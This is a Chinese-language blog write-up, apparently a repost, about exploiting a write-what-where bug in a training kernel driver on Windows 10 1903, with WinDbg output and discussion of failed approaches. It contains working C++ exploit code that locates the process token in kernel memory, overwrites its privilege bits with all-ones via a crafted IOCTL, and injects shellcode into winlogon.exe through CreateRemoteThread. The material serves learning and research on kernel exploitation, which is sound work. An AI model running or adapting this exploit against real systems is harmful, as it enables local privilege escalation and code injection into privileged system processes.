typedef struct _OBJECT_HEADER
{
     LONG PointerCount;
     union
     {
          LONG HandleCount;
          PVOID NextToFree;
     };
     POBJECT_TYPE Type;
     UCHAR NameInfoOffset;
     UCHAR HandleInfoOffset;
     UCHAR QuotaInfoOffset;
     UCHAR Flags;
     union
     {
          POBJECT_CREATE_INFORMATION ObjectCreateInfo;
          PVOID QuotaBlockCharged;
     };
     PVOID SecurityDescriptor;
     QUAD Body;
} OBJECT_HEADER, *POBJECT_HEADER;

所以如果需要看这个对象的一些会记录在object_header中的基本属性的时候，可以直接:

0: kd> dt _object_header  a4401ca8-0x18
nt!_OBJECT_HEADER
   +0x000 PointerCount     : 0n9
   +0x004 HandleCount      : 0n0
   +0x004 NextToFree       : (null) 
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0x8a ''
   +0x00d TraceFlags       : 0 ''
   +0x00d DbgRefTrace      : 0y0
   +0x00d DbgTracePermanent : 0y0
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0x2 ''
   +0x00f NewObject        : 0y0
   +0x00f KernelObject     : 0y1
   +0x00f KernelOnlyAccess : 0y0
   +0x00f ExclusiveObject  : 0y0
   +0x00f PermanentObject  : 0y0
   +0x00f DefaultSecurityQuota : 0y0
   +0x00f SingleHandleEntry : 0y0
   +0x00f DeletedInline    : 0y0
   +0x010 ObjectCreateInfo : 0x81cc63c0 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x81cc63c0 Void
   +0x014 SecurityDescriptor : 0x9f9bed11 Void
   +0x018 Body             : _QUAD

参考链接

http://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
https://medium.com/@ashabdalhalim/a-light-on-windows-10s-object-header-typeindex-value-e8f907e7073a

WindowKernelExploit2

2020-10-16T11:46:11.000Z

为了更快的解决问题，我尝试着在网上搜索相关wp，但是发现很多该系列的文章讨论的都不是在这个版本上进行的，所以导致很多WP在这个平台上已经不适用了。
然而现实中，Windows Kernel的EXP却也依然能够涵盖到非常新的win10版本上，说明即使在最新的win10上，也依然有利用的机会。所以这边的第二篇想简单讨论以下这种攻击在win10 1903上依然通用的一种解法

本篇转自安全客 https://www.anquanke.com/post/id/213428

Window Kernel Exploit 02 - Arbitrary Overwrite

任意地址写，在用户态中也是一种常见的漏洞，其形式通常存在一个可以被控制的指针，以及在之后的逻辑中，会发生一次对指针内容的修改:

int vulnerable_function(int addr_user_input, int content_user_input){
    int *ptr = addr_user_input;
    *ptr = content_user_input
}

这种漏洞在用户态有一些很容易能够想到的利用方法，比如修改内存中一些固定模块的函数指针，然后调用对应函数，从而跳转到指定的控制流上。在内核中的利用思路也是类似，不过会多一些防护，之后会慢慢道来。

漏洞点

用IDA可以很容易的看到问题所在:

int __stdcall ArbitraryOverwriteIoctlHandler(PIRP a1, PIO_STACK_LOCATION a2)
{
  int v2; // ecx

  v2 = 0xC0000001;
  if ( a2->Parameters.DeviceIoControl.Type3InputBuffer )
    v2 = TriggerArbitraryOverwrite((UserAddr *)a2->Parameters.DeviceIoControl.Type3InputBuffer);
  return v2;
}

int __stdcall TriggerArbitraryOverwrite(UserAddr *UserAddress)
{
  _DWORD *Where_addr; // edi
  _DWORD *What_content; // ebx

  ProbeForRead(UserAddress, 8u, 4u);
  Where_addr = (_DWORD *)UserAddress->Where;
  What_content = (_DWORD *)UserAddress->What;
  DbgPrint("[+] UserWriteWhatWhere: 0x%p\n", UserAddress);
  DbgPrint("[+] WRITE_WHAT_WHERE Size: 0x%X\n", 8);
  DbgPrint("[+] UserWriteWhatWhere->What: 0x%p\n", Where_addr);
  DbgPrint("[+] UserWriteWhatWhere->Where: 0x%p\n", What_content);
  DbgPrint("[+] Triggering Arbitrary Overwrite\n");
  *What_content = *Where_addr;
  return 0;
}

这个UserAddr是一个由用户态定义的结构体:

struct UserAddr
{
  int Where;
  int What;
};

这个就是一个典型的write-what-where的漏洞

利用思路

往哪儿写（旧思路）

在内核态，遇到这种漏洞的时候，第一个想到的应该就是需要往哪儿写。一个常见的套路的是nt!haldispatchTable，这个地址是一个ntokrnl.exe中的一个用来存放函数指针的全局对象，修改这个table中一个很少被调用的APINtQueryIntervalProfile对应的位置nt!haldispatchTable+4(64bit 为 nt!haldispatchTable+8)，此时就相当于是劫持了NtQueryIntervalProfile的调用。

要写什么（旧思路）

第一个直观的想法就是将用户态的shellcode地址写上去。然后就可以依照第一篇中写的EXP，修改一下放到这边去。但是这样的话，就有了第一章的CR4的问题。

新的地址（旧思路）

之前的做法需要用到ROP，我虽然找到了wjllz大师傅的博客，但是这个方法在我的测试环境上(1903)似乎不能正常work。于是我直接找到了他本人去问。大师傅人很好，给了我很多方向，然后我找到了一篇blackhat上的文章，里面提到了一种方法:

这个方法的原理是说，在形如NtGdiDdDDICreateAllocation，或者大佬博客里提到的NtGdiDdDDIGetContextSchedulingPriority这类和GDI相关的API调用的处理驱动中，有一片未初始化的可写可执行区域：

上图中的win32k!NtGdiDdDDIGetContextSchedulingPriority，这个地方就是驱动所在的导出表的位置

win32k!NtGdiDdDDIGetContextSchedulingPriority:
93e00689 ff259016e093    jmp     dword ptr [win32k!_imp__NtGdiDdDDIGetContextSchedulingPriority (93e01690)]
win32k!NtGdiDdDDISetContextSchedulingPriority:
93e0068f ff258c16e093    jmp     dword ptr [win32k!_imp__NtGdiDdDDISetContextSchedulingPriority (93e0168c)]
win32k!NtGdiDdDDIGetDeviceState:
93e00695 ff258816e093    jmp     dword ptr [win32k!_imp__NtGdiDdDDIGetDeviceState (93e01688)]

然而我们顺着找这个win32k!_imp__NtGdiDdDDIGetContextSchedulingPriority的地址，可以找到如下内容:

1: kd> dd win32k!_imp__NtGdiDdDDIGetContextSchedulingPriority
93e01690  9090f62f 90858cb6 90935941 90935a69
93e016a0  9082dad0 940dd204 940dcc95 940dc939
93e016b0  940dbcce 940dbb6f 940dd2af 940dcbd7

这个9090f62f正好指向一个实现在dxgkrnl.sys的对应函数:

1: kd> u 9090f62f
dxgkrnl!DxgkGetContextSchedulingPriority:
9090f62f 68a8000000      push    0A8h
9090f634 68a0c17d90      push    offset dxgkrnl!_realffefffffffffffff+0x1e30 (907dc1a0)
9090f639 e876a5e8ff      call    dxgkrnl!_SEH_prolog4_GS (90799bb4)
9090f63e 8b7508          mov     esi,dword ptr [ebp+8]
9090f641 838d58ffffffff  or      dword ptr [ebp-0A8h],0FFFFFFFFh
9090f648 33db            xor     ebx,ebx

于是一个新的想法就产生了：能不能将这个win32k!_imp__NtGdiDdDDIGetContextSchedulingPriority指向的地址给修改成我们shellcode的地址呢？

1: kd> dps win32kbase!gDxgkInterface
94193a30  002b018c
94193a34  94000000 win32kbase!EtwTraceUIPIInputError  (win32kbase+0x0)
94193a38  00000000
94193a3c  9082d944 dxgkrnl!DxgkCaptureInterfaceDereference
94193a40  9082d944 dxgkrnl!DxgkCaptureInterfaceDereference
94193a44  908254f6 dxgkrnl!DxgkProcessCallout
94193a48  907f4090 dxgkrnl!DxgkNotifyProcessFreezeCallout
94193a4c  9082a3e0 dxgkrnl!DxgkNotifyProcessThawCallout
94193a50  9080bf20 dxgkrnl!DxgkOpenAdapter
94193a54  907f2022 dxgkrnl!DxgkEnumAdapters2Impl
94193a58  9085b540 dxgkrnl!DxgkGetMaximumAdapterCount
94193a5c  90824d50 dxgkrnl!DxgkCloseAdapterImpl
94193a60  9081f8ac dxgkrnl!DxgkDestroyDevice
94193a64  90800180 dxgkrnl!DxgkEscape
94193a68  907ff340 dxgkrnl!DxgkGetPresentHistoryInternal
94193a6c  90935a69 dxgkrnl!DxgkReleaseProcessVidPnSourceOwners
94193a70  908e1b01 dxgkrnl!DxgkPollDisplayChildrenInternal 
94193a74  90858a48 dxgkrnl!DxgkFlushPresentHistory
94193a78  907edf46 dxgkrnl!DxgkGetPathsModality
94193a7c  90829e40 dxgkrnl!DxgkFunctionalizePathsModality
94193a80  90829d20 dxgkrnl!DxgkApplyPathsModality
94193a84  908202aa dxgkrnl!DxgkFinalizePathsModality
94193a88  907e35a4 dxgkrnl!DxgkPersistPathsModality
94193a8c  9082d3d2 dxgkrnl!DxgkFreePathsModality
94193a90  907e1c10 dxgkrnl!DxgkAugmentCdsj
94193a94  90855550 dxgkrnl!DxgkGetPresentHistoryReadyEvent
94193a98  907f6dec dxgkrnl!DxgkGetDisplayConfigBufferSizes
94193a9c  907f65b4 dxgkrnl!DxgkQueryDisplayConfig
94193aa0  909439b3 dxgkrnl!DxgkHandleForceProjectionMonitor
94193aa4  9082cf80 dxgkrnl!DxgkUpdateCddDevmodeExtraData
94193aa8  90943e68 dxgkrnl!DxgkProcessDisplayCalloutBatch
94193aac  907f5de2 dxgkrnl!DxgkDisplayConfigDeviceInfo

令人头痛的是，这个dxgkrnl中记录的这API，与文章中提到的API完全不一样，逆向后发现，好像有一段判断逻辑发生了偏移:

于是现在有了两个继续研究的方向

找到这个初始化函数的判断依据，想办法进行原先的那些API初始化
在先有的函数上找到同类型的函数指针进行劫持

不过，说起来初始化的类型不同的话，应该会导致依赖中断号的上层调用的时候出现问题呀，不知道windows是怎么解决的问题。

不过，后来我仔细思考了一下这个利用方法，总结其他其目的应该是:

通过修改dxgkrnl!DxgkGetContextSchedulingPriority的地址，这样就能够劫持NtGdiDdDDIGetContextSchedulingPriority
第一次将这个函数劫持为ExAllocatePoolWithTag，然后通过调用NtGdiDdDDIGetContextSchedulingPriority去调用ExAllocatePoolWithTag，分配一个RWX的空间
然后利用WWW漏洞，往这个空间写入shellcode
修改dxgkrnl!DxgkGetContextSchedulingPriority为ExAllocatePoolWithTag的地址，然后跳转到shellcode

既然是这个思路的话，那么为什么不使用最初提到的HalDispathTable？不过后来我试了一下发现返回值怪怪的，查看了ReactOS中的源码找到了原因:

NTSTATUS
NTAPI
NtQueryIntervalProfile(IN KPROFILE_SOURCE ProfileSource,
                       OUT PULONG Interval)
{
    KPROCESSOR_MODE PreviousMode = ExGetPreviousMode();
    ULONG ReturnInterval;
    NTSTATUS Status = STATUS_SUCCESS;
    PAGED_CODE();

    /* Check if we were called from user-mode */
    if (PreviousMode != KernelMode)
    {
        /* Enter SEH Block */
        _SEH2_TRY
        {
            /* Validate interval */
            ProbeForWriteUlong(Interval);
        }
        _SEH2_EXCEPT(EXCEPTION_EXECUTE_HANDLER)
        {
            /* Return the exception code */
            _SEH2_YIELD(return _SEH2_GetExceptionCode());
        }
        _SEH2_END;
    }

    /* Query the Interval */
    ReturnInterval = (ULONG)KeQueryIntervalProfile(ProfileSource);

    /* Enter SEH block for return */
    _SEH2_TRY
    {
        /* Return the data */
        *Interval = ReturnInterval;
    }
    _SEH2_EXCEPT(ExSystemExceptionFilter())
    {
        /* Get the exception code */
        Status = _SEH2_GetExceptionCode();
    }
    _SEH2_END;

    /* Return Success */
    return Status;
}

原来这个位置只能接受一个传参啊。。。。

后来绕回这个dxgkrnl的逻辑，发现依然无法修改函数地址，我搜了非常多的资料，终于在这个网站上找到了答案:
https://www.unknowncheats.me/forum/2567493-post86.html
这里提到了一个很重要的事情：windows 1903中，大部分的函数已经不使用win32kbase作为proxy，而是直接由dxgkrnl.sys导出函数来调用。
之前我试了很多次修改这个gDxgkInterface但是都不能work，原来是因为很多函数的逻辑里面根本就没有经过win32kbase!gDxgkInterface。。。。。。于是之前提到的所有利用手段都被堵上了。

和Linux kernel pwn的联想（新的思路）

在此期间一直在想，Linux的kernel pwn也是要找类似的跳板吗？看了一下相关ctf的writeup，发现大家其实都是再改cred这个结构体，这个结构体相当于是Linux中的一个权限管理结构体，所以通过修改这个结构体，就能够实现某个进程的提权。那Windows中就没有类似的结构体了吗？随着工作的进行，我发现Windows中的TOKEN这个结构体好像起到的作用就和这个cred类似，也是类似Windows下的权限控制（具体可以看这里Windows Via C/C++ note 4），那是不是改这个地方就可以了呢？

后来，又是wjllz大佬抬了一手，给了一篇文章:https://labs.bluefrostsecurity.de/blog/2020/01/07/cve-2019-1215-analysis-of-a-use-after-free-in-ws2ifsl/，这个文章里面提到了一个2012年就被提出来的，window kernel pwn应该做什么的文章http://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf，完美解释了我心中的疑惑。wjllz大佬给的文章都很有价值，大力吹一波~这些内容之后应该会趁机研究一下记录。不过这边我们先顺着这个WP中的思路走，解决一下我们当前的问题。

通过修改_TOKEN来进行提权

一个进程中的TOKEN结构体如下:

typedef struct _TOKEN
{
     TOKEN_SOURCE TokenSource;
     LUID TokenId;
     LUID AuthenticationId;
     LUID ParentTokenId;
     LARGE_INTEGER ExpirationTime;
     PERESOURCE TokenLock;
     LUID ModifiedId;
     SEP_TOKEN_PRIVILEGES Privileges;
     SEP_AUDIT_POLICY AuditPolicy;
     ULONG SessionId;
     ULONG UserAndGroupCount;
     ULONG RestrictedSidCount;
     ULONG VariableLength;
     ULONG DynamicCharged;
     ULONG DynamicAvailable;
     ULONG DefaultOwnerIndex;
     PSID_AND_ATTRIBUTES UserAndGroups;
     PSID_AND_ATTRIBUTES RestrictedSids;
     PVOID PrimaryGroup;
     ULONG * DynamicPart;
     PACL DefaultDacl;
     TOKEN_TYPE TokenType;
     SECURITY_IMPERSONATION_LEVEL ImpersonationLevel;
     ULONG TokenFlags;
     UCHAR TokenInUse;
     ULONG IntegrityLevelIndex;
     ULONG MandatoryPolicy;
     PSECURITY_TOKEN_PROXY_DATA ProxyData;
     PSECURITY_TOKEN_AUDIT_DATA AuditData;
     PSEP_LOGON_SESSION_REFERENCES LogonSession;
     LUID OriginatingLogonSession;
     SID_AND_ATTRIBUTES_HASH SidHash;
     SID_AND_ATTRIBUTES_HASH RestrictedSidHash;
     ULONG VariablePart;
} TOKEN, *PTOKEN;

据说这个结构体从Win7开始就没有太多的变动了，这里我们关注一下这几个结构体成员变量:

1	SEP_TOKEN_PRIVILEGES Privileges; // 0x40

这个结构体变量用bit位的方式记录了当前token中使用的privilege（特权）。我们都知道，token能够限制一个进程能能够对其他进程的权限控制，但是有时候我们也会需要有类似windbg之类的进程对其他各类进程进行调试，这个时候系统就会赋予调试器这个调试其他进程的特权。这个概念非常重要，我们通过给与当前进程特权，就能够往其他更高权限才能够接触到的进程中进行代码注入等，从而实现进程劫持等等，完成提权。
我们首先检查一下当前进程使用的token是怎么样的

: kd> !token
Thread is not impersonating. Using process token...
_EPROCESS 0xffffffffa25de040, _TOKEN 0x0000000000000000
TS Session ID: 0x1
User: S-1-5-21-3717723882-702046769-3252787667-1000
User Groups: 
 00 S-1-5-21-3717723882-702046769-3252787667-513
    Attributes - Mandatory Default Enabled 
 01 S-1-1-0
    Attributes - Mandatory Default Enabled 
 02 S-1-5-114
    Attributes - Mandatory Default Enabled 
 03 S-1-5-32-544
    Attributes - Mandatory Default Enabled Owner 
 04 S-1-5-32-545
    Attributes - Mandatory Default Enabled 
 05 S-1-5-4
    Attributes - Mandatory Default Enabled 
 06 S-1-2-1
    Attributes - Mandatory Default Enabled 
 07 S-1-5-11
    Attributes - Mandatory Default Enabled 
 08 S-1-5-15
    Attributes - Mandatory Default Enabled 
 09 S-1-5-113
    Attributes - Mandatory Default Enabled 
 10 S-1-5-5-0-252984
    Attributes - Mandatory Default Enabled LogonId 
 11 S-1-2-0
    Attributes - Mandatory Default Enabled 
 12 S-1-5-64-10
    Attributes - Mandatory Default Enabled 
 13 S-1-16-12288
    Attributes - GroupIntegrity GroupIntegrityEnabled 
Primary Group: S-1-5-21-3717723882-702046769-3252787667-513
Privs: 
 05 0x000000005 SeIncreaseQuotaPrivilege          Attributes - 
 08 0x000000008 SeSecurityPrivilege               Attributes - 
 09 0x000000009 SeTakeOwnershipPrivilege          Attributes - 
 10 0x00000000a SeLoadDriverPrivilege             Attributes - 
 11 0x00000000b SeSystemProfilePrivilege          Attributes - 
 12 0x00000000c SeSystemtimePrivilege             Attributes - 
 13 0x00000000d SeProfileSingleProcessPrivilege   Attributes - 
 14 0x00000000e SeIncreaseBasePriorityPrivilege   Attributes - 
 15 0x00000000f SeCreatePagefilePrivilege         Attributes - 
 17 0x000000011 SeBackupPrivilege                 Attributes - 
 18 0x000000012 SeRestorePrivilege                Attributes - 
 19 0x000000013 SeShutdownPrivilege               Attributes - 
 20 0x000000014 SeDebugPrivilege                  Attributes - Enabled <---所以当前进程token的特权值为0x2000
 22 0x000000016 SeSystemEnvironmentPrivilege      Attributes - 
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default 
 24 0x000000018 SeRemoteShutdownPrivilege         Attributes - 
 25 0x000000019 SeUndockPrivilege                 Attributes - 
 28 0x00000001c SeManageVolumePrivilege           Attributes - 
 29 0x00000001d SeImpersonatePrivilege            Attributes - Enabled Default 
 30 0x00000001e SeCreateGlobalPrivilege           Attributes - Enabled Default 
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - 
 34 0x000000022 SeTimeZonePrivilege               Attributes - 
 35 0x000000023 SeCreateSymbolicLinkPrivilege     Attributes - 
 36 0x000000024 SeDelegateSessionUserImpersonatePrivilege  Attributes - 
Authentication ID:         (0,3dca6)
Impersonation Level:       Anonymous
TokenType:                 Primary
Source: User32             TokenFlags: 0x2000 ( Token in use )
Token ID: b18ac1           ParentToken ID: 0
Modified ID:               (0, 654e3e)
RestrictedSidCount: 0      RestrictedSids: 0x0000000000000000
OriginatingLogonSession: 3e7
PackageSid: (null)
CapabilityCount: 0      Capabilities: 0x0000000000000000
LowboxNumberEntry: 0x0000000000000000
Security Attributes:
Unable to get the offset of nt!_AUTHZBASEP_SECURITY_ATTRIBUTE.ListLink
Process Token TrustLevelSid: (null)

从上可以看到，我们当前进程的权限有一个SeDebugPrivilege，这个特权的意思是Required to debug and adjust the memory of a process owned by another account.，也就是说能够调试并且调整由其他账号拥有的进程中的内存。这个权限其实蛮高的（做这个实验的时候，我正在用windbg调试，所以权限才会这么高）。不过我们希望能够做到的是往其他进程中注入线程，那么这个时候我们需要的可能就不止这个权限了，一个比较无脑的方式就是能不能将这些特权全部拿到手，就能够保证我们必定提权成功了。

于是我们稍微改动一下我们的利用code:

DWORD GetKernelPointer(HANDLE handle, DWORD type)
{
PSYSTEM_HANDLE_INFORMATION buffer = (PSYSTEM_HANDLE_INFORMATION)malloc(0x20);

DWORD outBuffer = 0;
NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer);

if (status == STATUS_INFO_LENGTH_MISMATCH)
{
free(buffer);
buffer = (PSYSTEM_HANDLE_INFORMATION)malloc(outBuffer);
status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, outBuffer, &outBuffer);
}

if (!buffer)
{
printf("[-] NtQuerySystemInformation error \n");
return 0;
}

for (size_t i = 0; i < buffer->NumberOfHandles; i++)
{
DWORD objTypeNumber = buffer->Handels[i].ObjectTypeNumber;

if (buffer->Handels[i].ProcessId == GetCurrentProcessId() && buffer->Handels[i].ObjectTypeNumber == type)
{
if (handle == (HANDLE)buffer->Handels[i].Handle)
{
//printf("%p %d %x\n", buffer->Handels[i].Object, buffer->Handels[i].ObjectTypeNumber, buffer->Handels[i].Handle);
DWORD object = (DWORD)buffer->Handels[i].Object;
free(buffer);
return object;
}
}
}
printf("[-] handle not found\n");
free(buffer);
return 0;
}
void InjectToWinlogon()
{
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);

HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

int pid = -1;
if (Process32First(snapshot, &entry))
{
while (Process32Next(snapshot, &entry))
{
if (_wcsicmp(entry.szExeFile, L"winlogon.exe") == 0)
{
pid = entry.th32ProcessID;
break;
}
}
}

CloseHandle(snapshot);

if (pid < 0)
{
printf("Could not find process\n");
return;
}

HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (!h)
{
printf("Could not open process: %x", GetLastError());
return;
}

void* buffer = VirtualAllocEx(h, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!buffer)
{
printf("[-] VirtualAllocEx failed\n");
}

if (!buffer)
{
printf("[-] remote allocation failed");
return;
}

if (!WriteProcessMemory(h, buffer, shellcode, sizeof(shellcode), 0))
{
printf("[-] WriteProcessMemory failed");
return;
}

HANDLE hthread = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);

if (hthread == INVALID_HANDLE_VALUE)
{
printf("[-] CreateRemoteThread failed");
return;
}
}
VOID TriggerArbitraryOverwrite(DWORD dwCTLCode) {
PVOID ExpAddress = &TokenStealingPayloadWin7;
DWORD dwRetSize = 0;
HANDLE hDev = GetDeviceHandle();
if (hDev == INVALID_HANDLE_VALUE)
return;
std::cout << "We Get handle is:" << std::hex << hDev << std::endl;
// New Method
HANDLE hCurrentProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
if (!hCurrentProcess) {
std::cout << "[-] Open Current process faiiled" << std::endl;
return;
}

HANDLE hToken = 0;
// the TOKEN_ADJUST_PRIVILEGES will enable/disable the privelage token
if (!OpenProcessToken(hCurrentProcess, TOKEN_ADJUST_PRIVILEGES, &hToken)) {
std::cout << "[-] Couldn't get current process token" << std::endl;
return;
}
// The 0x5 is what??????
DWORD kToken = GetKernelPointer(hToken, 0x5);
DWORD dwTargetOffset = kToken + 0x48;

std::cout << "The target token offest is " << dwTargetOffset << std::endl;
WrtieWhatWhere *WWW = (WrtieWhatWhere*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(WrtieWhatWhere));
WWW->Where = (ULONG_PTR)dwTargetOffset;
//std::cout << "Base address:" << dwBaseAddress << " ExOffset:" << ulExAllocatePool;
UINT64 uAllPrivelage= 0xffffffffffffffff;
WWW->What = (ULONG_PTR)&uAllPrivelage;
// WWW->What = (ULONG)&dwRealExAllocatePool;
// copy exp to target address
std::cout << "Now we will write[" << WWW->Where << "]:" << *(ULONG*)(WWW->What) << std::endl;
// send IOCTL to trigger 
OutputDebugString(L"[+]  =========== Kernel Mode  =============== [+]");
DeviceIoControl(hDev, dwCTLCode, WWW, sizeof(WrtieWhatWhere), NULL, NULL, &dwRetSize, NULL);
OutputDebugString(L"[+]  =========== IOCTL Finish =============== [+]");
std::cout << " IOCTL FIINISH "<
// Tro to inject code
InjectToWinlogon();
HeapFree(GetProcessHeap(), 0, WWW);
return;
}

然后试了一下。。。终于成功了！！！！

Exp分析

由于EXP是从别的地方抄过来的，有些地方其实有点云里雾里的，这里简单分析一下:

1	DWORD GetKernelPointer(HANDLE handle, DWORD type)

首先是这个函数，这是关键函数之一，正是用的这个函数我们找到了TOKEN的地址，不过话又说回来，这个函数做了些什么呢？函数首先尝试去call了NtSystemQueryInformation:

1	NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer);

这个API其实功能非常强大，能够返回大量系统中的重要信息。这里当我们传入的变量为StstemHandleInformation的时候，返回的变量为SYSTEM_HANDLE_INFORMATION，具体定义如下:

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
ULONG ProcessId;          // 当前对象从属的进程id
UCHAR ObjectTypeNumber;   // 表示当前对象的类型
UCHAR Flags;
USHORT Handle;            // 当前句柄
void* Object;             // 句柄所对应的真正object的地址
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;


typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handels[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

这个地方用了一个无限制数组的技巧：这个Handles[1]其实长度可以超过1，但是这样写的话能够让编译器知道这是一段数组，从而可以无限加长这个结构体的长度，不过用sizeof查看的时候，这个Handles是当作一个数组指针大小在考虑
通过调用这个函数，能够拿到当前进程中所有打开的句柄。于是我们通过检查句柄类型，找到当前进程中使用的TOKEN的句柄。不过具体这个ObjectTypeNumber具体是几表示什么意思，好像网上的资料并不多。。。不过我通过processexp配合函数，大概总结出几个来:

3 --> Directory
5 --> Token
7 --> Process
37 --> File
44 --> Key

于是这里通过给GetKernelPointer传入0x5，获取到这个TOKEN对象的真正的地址。于是之后我们就能够拿到_TOKEN结构体中偏移地址为0x40的结构体_SEP_TOKEN_PRIVILEGES:

nt!_SEP_TOKEN_PRIVILEGES
   +0x000 Present          : Uint8B
   +0x008 Enabled          : Uint8B
   +0x010 EnabledByDefault : Uint8B

此时Present表示的是这个token中被开启的特权，而Enabled中表示的是当前token中被允许的特权。在之前提到的这篇文章中，作者发现，其实Windows并不会check一个token的Present值，而是checkEnabled这个位置上的值有没有被打开，来证明其权限是否打开了。所以这里我们就能够简单的利用这一点，将这个变量修改为-1，从而让当前的token获得最高的权限。

踩坑记录

写这篇文章的时候，居然正逢微软服务器炸了，搞得服务器上的符号下载不下来。（第一次真正意义上甩锅给微软了。。。），导致分析驱动的时候遇到了很大的问题。主要体现在分析win32k.sys的时候，正常看起来是这样的

但是我当时看起来，这段地址直接不能访问，我只好自己建立了一个节，然后访问过去是这样的

现在想起来，似乎是当时由于符号服务器炸了，ida导入了错误的符号表，导致连PE头都识别错了。具体错误原因我猜测应该和符号有关系，因为等过了两天符号服务器好了之后，莫名其妙的之前的坑都消失了。。。
调试的时候遇到的第一个问题就是这段内容:

win32k!NtGdiDdDDIGetContextSchedulingPriority:
93e00689 ff259016e093    jmp     dword ptr [win32k!_imp__NtGdiDdDDIGetContextSchedulingPriority (93e01690)]
win32k!NtGdiDdDDISetContextSchedulingPriority:
93e0068f ff258c16e093    jmp     dword ptr [win32k!_imp__NtGdiDdDDISetContextSchedulingPriority (93e0168c)]
win32k!NtGdiDdDDIGetDeviceState:
93e00695 ff258816e093    jmp     dword ptr [win32k!_imp__NtGdiDdDDIGetDeviceState (93e01688)]

这段内容中，我想要查看win32k!_imp__NtGdiDdDDIGetContextSchedulingPriority指向的内容，检查过去发现地址是这样的

1: kd> dd win32k!_imp__NtGdiDdDDIGetContextSchedulingPriority
93e01690  9090f62f 90858cb6 90935941 90935a69
93e016a0  9082dad0 940dd204 940dcc95 940dc939
93e016b0  940dbcce 940dbb6f 940dd2af 940dcbd7

这个9090f62f就是要跳转的内容，但是我想查看的时候看到的内容是这样的

1: kd> dd 9090f62f
9090f62f  ???????? ???????? ???????? ????????
9090f63f  ???????? ???????? ???????? ????????
9090f64f  ???????? ???????? ???????? ????????

就很奇怪。。。后来我问了wjllz大佬，他说可能是地址空间的问题，然后给了一篇博客，里面提到了一个指令

1
2
3

!process 0 0 csrss.exe

.process /p /f EPROCESS address show above

然而我这么做之后，发现地址空间依然没有被映射，后来找到另一个暴力的指令：

1	.pagein /f addr

这个指令会强迫映射地址空间，这次成功的找到了地址内容:

1: kd> u 9090f62f
dxgkrnl!DxgkGetContextSchedulingPriority:
9090f62f 68a8000000      push    0A8h
9090f634 68a0c17d90      push    offset dxgkrnl!_realffefffffffffffff+0x1e30 (907dc1a0)
9090f639 e876a5e8ff      call    dxgkrnl!_SEH_prolog4_GS (90799bb4)
9090f63e 8b7508          mov     esi,dword ptr [ebp+8]
9090f641 838d58ffffffff  or      dword ptr [ebp-0A8h],0FFFFFFFFh
9090f648 33db            xor     ebx,ebx

中途一度放弃使用APINtGdiDdDDIGetContextSchedulingPriority，因为自己并没有去深究这个win32u.dll是什么。第二天和同事一起看的时候意外发现，无论怎么调用这里面的API，调用都会失败。使用windbg去调试之后发现，居然是在ntdll!KiUserCallbackDispatcher 调用失败了:

.text:6A291428                 pop     edx
.text:6A291429                 mov     eax, large fs:30h
.text:6A29142F                 mov     eax, [eax+2Ch]
.text:6A291432                 mov     ecx, [eax+edx*4]  <--------这一句，eax为0导致的

经过我们查看，这段逻辑是这样的:

1	NtCurrentPeb()->KernelCallbackTable[Index]

这就很奇怪了，进程的KernelCallbackTable居然是空的。那什么时候会填充呢？查来查去发现，原来是user32.dll中会初始化的东西，用来处理一些Ring0的系统调用。而我之前就真的很巧，没有把user32.dll包含在进程中。。。。。所以为了做戏做全套，这边只需要调用

1	LoadLibrary(L"gdi32.dll")

即可将user32.dll也导入。（gdi32.dll的初始化是在user32.dll中完成的）

94193a54  907f2022 dxgkrnl!DxgkEnumAdapters2Impl
94193a58  9085b540 dxgkrnl!DxgkGetMaximumAdapterCount
94193a5c  81b2c9ea nt!ExAllocatePool
94193a60  9081f8ac dxgkrnl!DxgkDestroyDevice

1: kd> k
 # ChildEBP RetAddr  
00 ad6e0b88 81b7628b dxgkrnl!DxgkCloseAdapter
01 ad6e0b88 77851570 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
02 0053fa7c 00ad18d5 0x77851570
03 0053fac8 777420f9 0xad18d5

不过非常遗憾。。这个问题再Win1903上无法解决。。。我找到了一个大佬云集的论坛里面提到了这个问题：
https://www.unknowncheats.me/forum/anti-cheat-bypass/335585-communicating-mapped-driver-using-hooks-5.html
这个地方的人提到了，win1903里面这个gDxgkInterface 接口不再导出函数了，而是直接在dxgkrnl.sys导出表里面导出，这样的话这段地址就受到了PG的保护，不能再被拿来利用了。。

找到秘籍之后，我第一次是无脑拷贝了shellcode，结果发生了报错:


 *** An Access Violation occurred in winlogon.exe:

The instruction at 029F00D1 tried to write to an invalid address, 0053DFFE

 *** enter .exr 02D4F880 for the exception record
 ***  enter .cxr 02D4F89C for the context
 *** then kb to get the faulting stack

后来发现人家的shellcode是x64平台上的，我这个是x86，所以换了一个shellcode就好了。。

WindowKernelExploit1.5

